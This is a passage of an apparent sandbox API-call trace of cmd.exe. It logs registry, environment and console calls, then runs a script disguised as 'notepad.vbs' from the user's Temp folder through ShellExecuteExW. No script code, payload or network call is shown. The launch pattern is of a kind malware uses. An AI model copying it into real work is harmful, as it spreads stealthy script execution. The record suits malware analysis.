lpProcName="SetThreadUILanguage") returned 0x75a4a84f [0020.103] SetThreadUILanguage (LangId=0x0) returned 0x409 [0020.103] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0020.103] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x43f8fc | out: phkResult=0x43f8fc*=0x0) returned 0x2 [0020.104] VirtualQuery (in: lpAddress=0x43f933, lpBuffer=0x43f8cc, dwLength=0x1c | out: lpBuffer=0x43f8cc*(BaseAddress=0x43f000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.104] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x43f8cc, dwLength=0x1c | out: lpBuffer=0x43f8cc*(BaseAddress=0x340000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0020.104] VirtualQuery (in: lpAddress=0x341000, lpBuffer=0x43f8cc, dwLength=0x1c | out: lpBuffer=0x43f8cc*(BaseAddress=0x341000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0020.104] VirtualQuery (in: lpAddress=0x343000, lpBuffer=0x43f8cc, dwLength=0x1c | out: lpBuffer=0x43f8cc*(BaseAddress=0x343000, AllocationBase=0x340000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.104] VirtualQuery (in: lpAddress=0x440000, lpBuffer=0x43f8cc, dwLength=0x1c | out: lpBuffer=0x43f8cc*(BaseAddress=0x440000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x170000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0020.104] GetConsoleOutputCP () returned 0x1b5 [0020.104] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a034260 | out: lpCPInfo=0x4a034260) returned 1 [0020.104] SetConsoleCtrlHandler (HandlerRoutine=0x4a02e72a, Add=1) returned 1 [0020.104] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.104] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0020.104] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.104] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0341ac | out: lpMode=0x4a0341ac) returned 1 [0020.105] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.105] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0020.105] _get_osfhandle (_FileHandle=0) returned 0x3 [0020.105] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0341b0 | out: lpMode=0x4a0341b0) returned 1 [0020.106] _get_osfhandle (_FileHandle=0) returned 0x3 [0020.106] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0020.106] GetEnvironmentStringsW () returned 0x7b22c0* [0020.106] FreeEnvironmentStringsW (penv=0x7b22c0) returned 1 [0020.106] GetEnvironmentStringsW () returned 0x7b22c0* [0020.107] FreeEnvironmentStringsW (penv=0x7b22c0) returned 1 [0020.107] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x43e86c | out: phkResult=0x43e86c*=0x68) returned 0x0 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x0, lpData=0x43e878*=0x0, lpcbData=0x43e870*=0x1000) returned 0x2 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x4, lpData=0x43e878*=0x1, lpcbData=0x43e870*=0x4) returned 0x0 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x0, lpData=0x43e878*=0x1, lpcbData=0x43e870*=0x1000) returned 0x2 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x4, lpData=0x43e878*=0x0, lpcbData=0x43e870*=0x4) returned 0x0 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x4, lpData=0x43e878*=0x40, lpcbData=0x43e870*=0x4) returned 0x0 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x4, lpData=0x43e878*=0x40, lpcbData=0x43e870*=0x4) returned 0x0 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x0, lpData=0x43e878*=0x40, lpcbData=0x43e870*=0x1000) returned 0x2 [0020.107] RegCloseKey (hKey=0x68) returned 0x0 [0020.107] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x43e86c | out: phkResult=0x43e86c*=0x68) returned 0x0 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x0, lpData=0x43e878*=0x40, lpcbData=0x43e870*=0x1000) returned 0x2 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x4, lpData=0x43e878*=0x1, lpcbData=0x43e870*=0x4) returned 0x0 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x0, lpData=0x43e878*=0x1, lpcbData=0x43e870*=0x1000) returned 0x2 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x4, lpData=0x43e878*=0x0, lpcbData=0x43e870*=0x4) returned 0x0 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x4, lpData=0x43e878*=0x9, lpcbData=0x43e870*=0x4) returned 0x0 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x4, lpData=0x43e878*=0x9, lpcbData=0x43e870*=0x4) returned 0x0 [0020.107] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x43e874, lpData=0x43e878, lpcbData=0x43e870*=0x1000 | out: lpType=0x43e874*=0x0, lpData=0x43e878*=0x9, lpcbData=0x43e870*=0x1000) returned 0x2 [0020.107] RegCloseKey (hKey=0x68) returned 0x0 [0020.107] time (in: timer=0x0 | out: timer=0x0) returned 0x5c2f3677 [0020.107] srand (_Seed=0x5c2f3677) [0020.107] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs" [0020.108] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs" [0020.108] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a035260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.108] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x7b22c8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0020.109] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a040640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0020.109] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a040640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0020.109] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a040640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0020.109] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0020.109] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0020.109] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0020.109] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0020.109] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0020.109] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0020.109] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0020.109] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0020.109] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0020.109] GetEnvironmentStringsW () returned 0x7b24d8* [0020.110] FreeEnvironmentStringsW (penv=0x7b24d8) returned 1 [0020.110] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a040640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0020.110] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a040640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0020.110] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0020.110] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0020.110] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0020.110] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0020.110] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0020.110] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0020.110] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0020.110] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0020.110] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x43f638 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.110] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x43f638, lpFilePart=0x43f634 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x43f634*="Desktop") returned 0x25 [0020.110] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0020.110] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x43f3b4 | out: lpFindFileData=0x43f3b4) returned 0x7b2140 [0020.110] FindClose (in: hFindFile=0x7b2140 | out: hFindFile=0x7b2140) returned 1 [0020.110] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x43f3b4 | out: lpFindFileData=0x43f3b4) returned 0x7b2140 [0020.110] FindClose (in: hFindFile=0x7b2140 | out: hFindFile=0x7b2140) returned 1 [0020.110] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0020.110] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x43f3b4 | out: lpFindFileData=0x43f3b4) returned 0x7b2140 [0020.111] FindClose (in: hFindFile=0x7b2140 | out: hFindFile=0x7b2140) returned 1 [0020.111] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0020.111] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0020.111] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0020.111] GetEnvironmentStringsW () returned 0x7b4348* [0020.111] FreeEnvironmentStringsW (penv=0x7b4348) returned 1 [0020.111] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a035260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.111] GetConsoleOutputCP () returned 0x1b5 [0020.112] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a034260 | out: lpCPInfo=0x4a034260) returned 1 [0020.112] GetUserDefaultLCID () returned 0x409 [0020.112] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a034950, cchData=8 | out: lpLCData=":") returned 2 [0020.112] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x43f778, cchData=128 | out: lpLCData="0") returned 2 [0020.112] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x43f778, cchData=128 | out: lpLCData="0") returned 2 [0020.112] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x43f778, cchData=128 | out: lpLCData="1") returned 2 [0020.112] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a034940, cchData=8 | out: lpLCData="/") returned 2 [0020.112] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a034d80, cchData=32 | out: lpLCData="Mon") returned 4 [0020.112] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a034d40, cchData=32 | out: lpLCData="Tue") returned 4 [0020.113] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a034d00, cchData=32 | out: lpLCData="Wed") returned 4 [0020.113] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a034cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0020.113] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a034c80, cchData=32 | out: lpLCData="Fri") returned 4 [0020.113] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a034c40, cchData=32 | out: lpLCData="Sat") returned 4 [0020.113] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a034c00, cchData=32 | out: lpLCData="Sun") returned 4 [0020.113] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a034930, cchData=8 | out: lpLCData=".") returned 2 [0020.113] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a034920, cchData=8 | out: lpLCData=",") returned 2 [0020.113] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0020.114] GetConsoleTitleW (in: lpConsoleTitle=0x7a1068, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0020.114] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75a20000 [0020.114] GetProcAddress (hModule=0x75a20000, lpProcName="CopyFileExW") returned 0x75a53b92 [0020.114] GetProcAddress (hModule=0x75a20000, lpProcName="IsDebuggerPresent") returned 0x75a34a5d [0020.114] GetProcAddress (hModule=0x75a20000, lpProcName="SetConsoleInputExeNameW") returned 0x75a4a79d [0020.117] _wcsicmp (_String1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs", _String2=")") returned 58 [0020.117] _wcsicmp (_String1="FOR", _String2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs") returned 3 [0020.117] _wcsicmp (_String1="FOR/?", _String2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs") returned 3 [0020.117] _wcsicmp (_String1="IF", _String2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs") returned 6 [0020.117] _wcsicmp (_String1="IF/?", _String2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs") returned 6 [0020.117] _wcsicmp (_String1="REM", _String2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs") returned 15 [0020.117] _wcsicmp (_String1="REM/?", _String2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs") returned 15 [0020.118] GetConsoleTitleW (in: lpConsoleTitle=0x43f470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0020.118] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.118] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.118] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x43f22c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x43f224, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x43f224*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0020.119] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0020.119] SetErrorMode (uMode=0x0) returned 0x0 [0020.119] SetErrorMode (uMode=0x1) returned 0x0 [0020.120] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\.", nBufferLength=0x208, lpBuffer=0x7b3388, lpFilePart=0x43ef90 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpFilePart=0x43ef90*="Temp") returned 0x24 [0020.120] SetErrorMode (uMode=0x0) returned 0x1 [0020.120] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\.") returned 1 [0020.120] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a040640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0020.124] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0020.124] FindFirstFileExW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs", fInfoLevelId=0x1, lpFindFileData=0x43ed2c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x43ed2c) returned 0x7a1280 [0020.124] FindClose (in: hFindFile=0x7a1280 | out: hFindFile=0x7a1280) returned 1 [0020.125] _wcsicmp (_String1=".vbs", _String2=".CMD") returned 19 [0020.125] _wcsicmp (_String1=".vbs", _String2=".BAT") returned 20 [0020.125] GetConsoleTitleW (in: lpConsoleTitle=0x43f204, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0020.125] InitializeProcThreadAttributeList (in: lpAttributeList=0x43f08c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x43f154 | out: lpAttributeList=0x43f08c, lpSize=0x43f154) returned 1 [0020.125] UpdateProcThreadAttribute (in: lpAttributeList=0x43f08c, dwFlags=0x0, Attribute=0x60001, lpValue=0x43f14c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x43f08c, lpPreviousValue=0x0) returned 1 [0020.125] GetStartupInfoW (in: lpStartupInfo=0x43f048 | out: lpStartupInfo=0x43f048*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x144, lpReserved2=0x7a19f2, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0020.125] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0020.126] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0020.126] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0020.126] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0020.126] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0020.126] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0020.126] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0020.126] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0020.126] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0020.126] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0020.126] lstrcmpW (lpString1="\\notepad.vbs", lpString2="\\XCOPY.EXE") returned -1 [0020.128] CreateProcessW (in: lpApplicationName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs", lpCommandLine="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x43f0e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x43f134 | out: lpCommandLine="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs", lpProcessInformation=0x43f134*(hProcess=0x0, hThread=0x0, dwProcessId=0x0, dwThreadId=0x0)) returned 0 [0020.131] GetLastError () returned 0xc1 [0020.131] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0020.131] GetEnvironmentStringsW () returned 0x7b4348* [0020.131] FreeEnvironmentStringsW (penv=0x7b4348) returned 1 [0020.131] GetConsoleWindow () returned 0x301f4 [0020.131] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x76670000 [0021.723] GetProcAddress (hModule=0x76670000, lpProcName="ShellExecuteExW") returned 0x76691e46 [0021.723] ShellExecuteExW (in: pExecInfo=0x43f0ac*(cbSize=0x3c, fMask=0x8140, hwnd=0x301f4, lpVerb=0x0, lpFile="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs", lpParameters=0x0, lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x43f0ac*(cbSize=0x3c, fMask=0x8140, hwnd=0x301f4, lpVerb=0x0, lpFile="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs", lpParameters=0x0, lpDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x21c)) returned 1 [0022.695] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0025.747] GetExitCodeProcess (in: hProcess=0x21c, lpExitCode=0x43f028 | out: lpExitCode=0x43f028*=0x0) returned 1 [0025.747] CloseHandle (hObject=0x21c) returned 1 [0025.747] _vsnwprintf (in: _Buffer=0x43f170, _BufferCount=0x13, _Format="%08X", _ArgList=0x43f034 | out: _Buffer="00000000") returned 8 [0025.747] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0025.747] GetEnvironmentStringsW () returned 0x7ca2f0* [0025.747] FreeEnvironmentStringsW (penv=0x7ca2f0) returned 1 [0025.747] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0025.747] GetEnvironmentStringsW () returned 0x7ca2f0* [0025.747] FreeEnvironmentStringsW (penv=0x7ca2f0) returned 1 [0025.747] DeleteProcThreadAttributeList (in: lpAttributeList=0x43f08c | out: lpAttributeList=0x43f08c) [0025.747] _get_osfhandle (_FileHandle=1) returned 0x7 [0025.747] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0025.747] _get_osfhandle (_FileHandle=1) returned 0x7 [0025.747] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0341ac | out: lpMode=0x4a0341ac) returned 1 [0025.748] _get_osfhandle (_FileHandle=0) returned 0x3 [0025.748] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0341b0 | out: lpMode=0x4a0341b0) returned 1 [0025.748] SetConsoleInputExeNameW () returned 0x1 [0025.748] GetConsoleOutputCP () returned 0x1b5 [0025.748] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a034260 | out: 